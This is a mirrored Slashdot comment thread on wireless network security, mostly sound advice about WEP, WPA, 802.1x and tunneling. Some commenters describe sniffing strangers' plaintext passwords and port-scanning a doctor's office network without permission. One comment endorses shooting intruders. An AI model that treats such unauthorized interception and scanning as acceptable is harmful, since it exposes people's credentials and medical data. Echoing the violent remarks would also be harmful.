Slashdot Mirror
Risk Management of Wireless Networks
An anonymous reader writes "As wireless becomes a bigger part of our networks, those of us charged with maintaining them find ourselves also responsible for keeping drive-by script kiddies with a Pringles can out. BankInfoSecurity.com is running an excellent article on identifying and mitigating risks on wireless networks. The article was written by members of the Office of the Comptroller of the Currency (OCC) for banks, but it's applicable to any network environment and clearly lays out all the key steps to protecting wireless systems." There's nothing new here, really, but it's a good overview of issues to keep in mind when building a wireless net, as well as a good security plan starting point.
I'm sorry, but banks should not be using wirless networks. Yes, yes, I realize wires are inconvenient, but they are much more secure. This is the customer's money and lives they're dealing with, not just some company secrets.
What's with the Pringles Can?
THOSE PESKY WARDRIVERS!!
I have great doubts that say, the government will ever allow sensitive or classified information to go on a wireless link, even if it is "secured".. there's just too much freedom in the air between origin and destination.
Fiber should continue to be used for any info that could be considered sensitive at all.. but then again, who am i kidding.. businesses just want things to be easy, not safe
--Less Thinkin', More Drinkin'...
I think that the problem is that there are a lot of people who are hearing of the WiFi craze, hearing that it is a good idea, and then setting up these adhoc networks. The problem is, they often don't bother to read up about the potential security risks of misconfiguration and so if (when?) they mess up, there's a wide open hole right there.
:-))
(And no, "wide open hole" isn't a goatse link
Slashdot: when news breaks, we give you the pieces.
The text has been modified. Search for "pig" in the text.
found here
uh, no it's not. AC Karma wh#@$...
Just have your wireless devices set to a DMZ that opens to one page, a VPN portal. Then you have a wireless connection, with VPN providing your security. Voila...a little bit more cumbersome, but isn't your network integrity worth it?
Security Practicum: Essential Home Wireless Security Practices
Slashdot Moderation: From positive to terrible in 2 "insightful" posts.
I've had some fun sniffing the network around the office, around town, and at O'Reilly OSXCon, and I think the biggest security risk I see on wireless networks are plaintext POP passwords going out in-the-clear.
.02.
It's amazing how many people who should know better are still using plain POP for grabbing their mail. Since most mail client recheck for mail every few minutes, it's quite simple to grab passwords. Using those password, a hacker can then try the same password to enter the network, read the person's e-mail to do subsequent social engineering, or just fish around the person's e-mail for interesting information.
The second thing I think most people don't realize is that on a standard wireless network all the HTTP url's they are surfing to with a web browser are public. This may not be a security risk, but companies also may not want a hacker in the parking lot to know that a server named secretinternaldata.mycompany.com exists.
I set up an SSH tunnel from my laptop to my squid proxy at home just for fun to see if I could fix the issue. It worked well, but of course it's not something the average end-user with a laptop on wireless could manage.
Anyway, that's my
- "When you want something with all your heart, the entire universe conspires to give it to you" -Paulo Coelho
Can you take a Linksys (or any other brand) 4 port wireless router and simply disable the wireless ability of it and just use it as a standard wired 4 port router?
Why? I don't need wireless ability now (I just use normal wired ethernet), but may need wireless in the future.
Disclaimer: I work in Information Security.
But, by all means:
We now return you to your regularly scheduled programming.
I for one, welcome our new OCC over lords.
I couldn't resists.
I shall now bathe in the cleansing flame.
"You should always go to other people's funerals; otherwise, they won't come to yours." -- Yogi Berra
but for reason does a bank need wireless access? In environment that could benefit (warehouses and such), there are ways to help limit how far the signal gets. Most warehouses have cinder block or steel panel walls, you could also add some grounded chicken wire or some of meshed metal wiring to the exterior walls to keep the signal from escaping the building... just fyi
Politics, Life, and More on my Aspiring for the Future
I saw only a tiny blurb about WPA, which should be a primary consideration for banks and credit unions analyzing the risk of wireless.
WPA has stronger encryption that WEP and authentication mechanisms built in. I work for a Credit Union processing/software company, and many financial institutions are waiting for WPA to become more mature before they jump into wireless.
For more info, google, or check this out.
The switch has all inline power ports to power the APs, which may or may not be directly connected. Each AP automatically creates an IPSEC tunnel back to the switch. The switch supports every auth method under the sun (EAP-TTLS being generally most secure) when combined with 802.1x (which includes dynamic WEP/WPA 2.0). The switch itself supports a per-user firewall, integrated, signature-based IDS (that detects things like monkeyjack and netstumbler), and terminates 2 Gbps of IPSEC (which includes the IPSEC client running on each user's machine.
All of this for a couple of grand. Secure wireless is possible, the market is demanding it, and vendors have come to meet that demand.
I agree 100%.
The hoopla about physical access security obscures the point that *all* internet traffic and most intranet traffic is viewable by others. It is a good idea to assume that all your networks are open and to use VPN, ssh, etc. to secure your data. And *never* send plain-text passwords.
If you lock your data down under this assumption (that all network traffic may be intercepted) the impetus for clunky and insecure wireless access restrictions is much diminished.
used to use WiFi between it's checkouts and inventory system. No encryption, SSID broadcasts were switched on and everything, to the extent that we used to sit in the car park and surf the web via their connection for hours on end on Saturday afternoons.
This was a good 18 months ago though. I'd assume they've changed it now. I certainly made a point of telling them why I wasn't shopping there any more, rather than doing the whole 'your network is totally unsecure and I found out why' thing and getting myself arrested...
If you're smart when you set up your access point, and turn on WEP, 99.9% of people that might hack your network are going to go find an easier target. The typical figure I've heard is 24 hours or more to get enough traffic to break the encryption. Unless someone knows you have something they want, they're not going to bother.
Home users are going to generate less traffic than businesses, and so it will take even longer to get enough traffic. Unless you happen to notice a van parked outside your house for a couple days, or find yourself staring down the barrel of a pringles can, you can relax.
Turn off SSID broadcasting
use a unique SSID
For God's sake, change the admin password
Turn on WEP
Use MAC address filtering
Congratulations, you're now more trouble than you're worth.
found here
If you are responsible for a company's security, you should regularly search for wireless nodes within your organization which you are not aware of WHETHER OR NOT you are using wireless as policy.
I have been asked to assess companies and offered a wireless audit. They said "we don't use wireless". I checked anyway, and it turned out they DID have wireless (but didn't know about it) thanks to in one instance, a laptop acting as an AP and in another, a sysadmin who figured he'd plug in a wireless AP with built-in switch instead of a hub or switch, and wireless was turned on. This is all the more problematic as the laptop and wireless device were both inside the firewall and therefore represented a major hole.
Intruders may also leave wireless devices behind to save coming onto the site for subsequent eavesdropping. That is, they will bring your network to them rather than bringing themselves to your network.
In any case, fire up your stumbling application, a GOOD antenna and have a look around your own environment. You may be surprised what you see!
Do you or your partner snore? - Visit www.snoring.com.au
This all being said from somebody who logins into their favorite geek news site without the faintest bit of encryption!
The problem with plaintext POP passwords is that many ISPs (mine included) do not offer any other option. I wish they would, but they do not.
Thus, I just choose a mail-only password that I use for POP access. I guess a hacker could read my e-mail and maybe even send mail as me, but I've done what I can to minimize the risk of stupidly designed mailservers.
Pinball, arcade video, tech and more: www.micsaund.com
Nevermind the professional hackers with a 12db antenna engaged in corporate espionage...
I mean seriously, I think the scR1pt k1Dd13 n00bs are the least of our problems.
Yeah, I see a lot of people stuck like that with insecure POP, and a lot of people who use the same password for their home account (which is almost always POP only) as they do for their work account. Bad bad bad.
One thing you could do, if you want to be a bit more secure, is to port forward port 110 using SSH to a server at home. Your POP password is still going out in the clear then, but it's going in the clear from your house, which is presumably more secure that going out over open wireless.
the tunnel would be something like this:
ssh -L 110:www.yourhomeserver.com:110 -f -N yourname@www.yourhomeserver.com
Here's a howto that goes into a little more depth.
- "When you want something with all your heart, the entire universe conspires to give it to you" -Paulo Coelho
I know this is off the subject but..
My company has recently begun implementing wireless
networks, using all Cisco equipment.
Base on my reading, it looks like you should only use Spanning Tree Protocol with wireless
bridges, not with access points. Why is this?
What's the difference between a wireless access point and a wireless bridge?
I just got a wireless Ad-Hoc network using iwconfig on Linux.
How do I tell iwconfig not to broadcast the essid?
(Please browse at -1 to read this comment.)
He'd left it open to facilitate use by visitors, but no longer.
Mencken had it right. So glad that's old news.
many ISPs do not offer any other option
Use your ISP for connectivity and spend $30-35 a year for a better mail service.
For less than 3 bucks a month, you might even get HTTPS webmail thrown in ... some extra storage ... and one of those "lifetime" domain names that gives you some flexibility regarding additional accounts and spam control.
If email matters to you, it is doubtful you can find an ISP for twice the price that gives you mail security and your current level of non-mail speed and features (how most people pick their provders).
Finally!
/.ers, WPA is the way to go. (Until I can get ".x" on my Ethernet...)
All this talk of MAC-address locking, SSID changes, WEP key rotation. (All good steps if you can't use WPA)
And WPA fixes (almost) everything.
So while I give flinxmeister "The Hammer" for hitting the nail on the head, I've got to add my voice to the general theme, BANKS should NEVER go wireless.
Historic building? Asbestos? Cutting quarterly costs to make bonus targets? Fuggedaboutit. There ain't no "safe" wireless vis a vis any financial institution.
But for the rest of us, get the upgrades in place
Does anyone have instructions on how to make a foil beanie for my wireless router to tremble under????
Well, you certainly sound more sane than the prior post....and I appreciate that hammer!
;)
However, remember the title of the article: "Risk management". There is no safe way of banking or doing business...period. There are only various shades of grey. As long as a financial institution understands the risks and takes appropriate steps to mitigate the risks and shield their customers/members from damage, they can implement a given technology. The question this thread seems to be encountering is "what is the level of risk that is impossible to mitigate". I submit that a wireless network with WPA and some other tricks falls well within the realm of manageable risk.
When you use an ATM, or buy something on the 'net, or give your personal check to someone, or use internet banking, or give someone your social security number, you are engaging in far, far more risk than if your FI uses a properly secured wireless network.
Did you know that your entire financial history is routinely fedexed on a tape? Did you know that there's a 99% chance that your financial data is routinely transmitted through multiple telecom companies unencrypted? Did you know that there is a good chance your paycheck is transmitted via a very secure, but very DDOSable single Federal Reserve website?
Trust me or don't, a loan officer on a car lot using a properly secured WPA implementation to loan you money is perfectly safe compared to the risk you are exposed to every day by simply existing as a financial being.
But before you put all your money into your matress, manage the risk of a house fire.
I wish there was a way for me, as a Christian, as a human being, to sit down with some of you and have a pleasant, civil discussion without bitterness or sarcasm. I don't force people to believe what I believe. I don't mock others with different beliefs. I hope I can find the words to explain myself, as my life goes on. I hope I can help people to see.
I would like to use encrypted passwords but most providers do not have encryption password feature for POP3 on their side. :(
Ant(Dude) @ Quality Foraged Links (AQFL.net) & The Ant Farm (antfarm.ma.cx / antfarm.home.dhs.org).
Guilty as charged. This is a public forum and I have transmitted no data to it that I consider sensitive. I assume that my Slashdot password may be compromised - that may let you impersonate me here but it won't get you into my bank or my paypal account, or my personal computer for that matter.
So, for kicks, I took my libretto to the office on my next visit and fired up kismet.
They are wide open. No WEP, Windoze boxes (including the domain controllers) all easily accessible. A quick port scan showed all types of vulnerable services and such. I did not take the time to go further, but figure that getting patient records would not be too difficult.
From the port scans, it seems that this small office is also on the same subnet as other businesses in the area. WTF???
So what is one to do? I dare not tell them what I found, what with the risk of being labeled a terrorist and all. I thought that an anonymous letter to them might be best. But how can I be sure that they ever fix the problem?
I am aware of the dangers of wirelsss, it's becoming the top networking solutions for homes and small business. A simple drive around town yields 80+% open networks, there is a solution though. it will eventually cost money(a) and it will be a long process but it will work.. Simply create and air a PSA on local television, by law they have to run them and they are free to run, you only have production cost(a(depending on scale and quality will determine the cost)) and that is a non-issue really. A good PSA that runs like tobacco adds will start working when you show what can happen to an open wireless network.. All in 30 seconds:)
Tell him... gently.
Explain to him that you're a hardcore networking geek with an interest in security, and that you often run security checks against your own systems. You were there, running one just for kicks, and viola! You are a patient of his presumably, so you already have a relationship and rapport... it would be different if you were some joe-blo off the street who came waltzing into his office running kismet on your Zaurus.
He probably has NO CLUE that whoever set up his network has left it open to be plundered (tech-saavy doctors are rare. Thinking about all my colleagues, I can count the tech-saavy on one hand).
Take him aside privately, and explain to him that you were hesitant to come forward (for obvious reasons... like being labeled a cracker), but that you really felt he should know what was up, not only for the security of your own medical records, but also for the security of everyone else's. Heh... he might even hire you to help fix it.
You will likely find him VERY receptive if you approach him the right way. I'm quite certain he contracts his IT stuff out to somebody, so he probably has ZERO emotional investment in the security of his network... he just wants it to work, and pass HIPAA muster (which it probably doesn't right now).
I bet he'd be receptive.
Even if a man chops off your hand with a sword, you still have two nice, sharp bones to stick in his eyes.
We have none in our offices.
But those cordless phones in use are a yes yes...?
The simplicity of the problem is compounded by the complexity of the solution.
This lawyer runs a WIFI hotspot for his office. All boxes have decent firewalls and the CPUs are all off-line after hours (e.g. whenever we are not working late).
.40 cal in is Sig Sauer over 9mm.
I don't care about free riders. I want a few. Let the RIAA claim I have downloaded anything. . . I haven't and neither have my staff. BUT I would love the accusation.
The client data and the electronic filings are all all encrypted (PGP on office systems or SSL in submission to the federal courts where most become a public record) and so is all email.
Other than that Canadian idiot who was found with his pants off and kiddie crap on his laptop, I have no worries.
I also have an office in a small town near a big city in the midwest. I know my town's mayor, elected officers and police. I also have my fly rods, shotguns and a single handgun in the 114 year old building.
The first idiot that runs into the building nekked with kiddie pr0n on his laptop can elect the 9mm or the Parker exit. There will be no alternative. The time frame will be a few milliseconds (police are a two clicks away, fire station 50 M).
Either way, he is history (strange that there are no women who act this dumb). I doubt that the inquest would go beyond the coroner. He needed killing.
If we were lucky enough to wack a "sting", so much the better! There is no defense to downloading kiddie pr0n and killing that sick f**k too quickly may be the only liability.
The endodontist in town has the same view, though he favors frangible
Meanwhile, let the RIAA accuse me of downloading anything. I'd love it! I'd sue them up, down and each attorney individually and I'd prefer ethics charges as well. I can only hope that we draw one or the other to our little trap. Meanwhile, any student or local who needs a quick link to the Internet can enjoy our on-ramp.
I see nothing (aside from the pr0n free riders) negative about an open wifi access point.
One particularly annoying connection gave me a 192.168.1 address and let me ping 192.168.1.1 but do absolutely nothing else. I ran nmap and nessus against the ip and absolutely nothing came back. It was freakiest thing I've ever seen. Its like someone bought a Linksys and powered it up without attaching it to anything else on the internal or external side.
;-)
Most likely, neither solution is correct. The WIN box sharing the internet connection is in BSOD and nobody noticed it yet.
The truth shall set you free!
The router would like you much better if you replaced the antenna with a proper (microwave not CB band) 50 ohm dummy load. It is possible to feed a stub of tin foil and it could radiate the signal. A dummy load in a coaxial fitting provides a load on the transmitter preventing high standing waves which can produce high current or high voltage nodes in the router which radiate the signal.
The truth shall set you free!
The problem is that some WiFi devices can't connect to AP if it does not broadcast the SSID.
I got two USB WiFi devcies and they would not work until I re-enabled SSID broadcasting.
When you buy devices it is not obvious if they will work without the SSID being broadcasted.
Perhaps a compilation of devices that are more secure should be gathered somewhere.
IANAL but write like a drunk one.
The zero-risk to yourself approach is to do nothing. Next up is the anonymous letter, and the continuum extends right up to admitting you've used their network...your choice where you draw the line.
I'm not trolling here - I'm completely serious. Wireless networks offering access to the Internet using existing 802.11 security mechanisms should be illegal.
This crowd seems to be thinking only of security against direct attack - but by FAR the greater problem is "third-party liability". If someone uses your wireless network to attack a third party, YOU are liable for the damages.
In a time when we're all fighting spammers and other attackers, the morons out there installing wireless networks are giving attackers the greatest tool they've ever had - free, untraceable, high-bandwidth network access.
Do your part - turn OFF every existing wireless lan. Demand 802.1x security mechanisms. (The 802.1x standard, although still in draft form, has already been implemented as part of Cisco Wireless Security Suite.)
The only valid security mechanisms for 802.11x WLANs to be developed so far ALL require client behavior that is outside the scope of the 802.11x standards. There is no such thing as a standards-only, secure 802.11 network.
Security in 802.11x will come from the incorporation of 802.1x - that's not a typo - 802.1x is a security standard that fixes all of the problems with existing wireless security techniques and is meant to be the foundation for future enterprise network security.
Don't think "WPA" is a solution either - it's already been cracked as well. The only solution in the foreseeable future is 802.1x. Push for it. Push back AGAINST the stupid wireless networks that are presently jeapordizing the entire Net.
Hence my admonition... it's all in the presentation.
Physicians are insanely busy people... busy taking care of patients, busy dealing with insurance companies, busy trying to comply with govt. regulations. No doctor has a legal department sitting on its hands with nothing to do, just waiting to prosecute/sue a patient who happens to fire up his laptop in the waiting room and inadvertantly pick up the open AP. The original poster is a patient of that physician, and did not hack into the open network.. he simply found it.
Prosecuting your own patient (who was trying to do the right thing by informing the doctor of a big confidentiality problem) would play VERY POORLY in the local newspapers... physicians have a professional reputation to uphold, one that's more valuable than gold. Prosecuting your own patient for trying to help you looks pretty shitty, even to a non-techie layman... and the doctor can't afford to hire a public relations firm to repair his damaged reputation, unlike {insert your favorite MegaCorp here}.
In a way, the original poster is not only helping the doctor, he's helping assure the safety of his own medical records (which he arguably has the right to do). Also consider that if he discusses this matter during the course of a patient visit, that communication could be considered privileged, and NOT admissable as evidence without the patient's consent. Also, there's the small matter of getting a prosecutor to pursue the case, and a jury to convict...
I stand by my comments.
Even if a man chops off your hand with a sword, you still have two nice, sharp bones to stick in his eyes.
Interesting history you have of trolling on your own trolls. Fucker.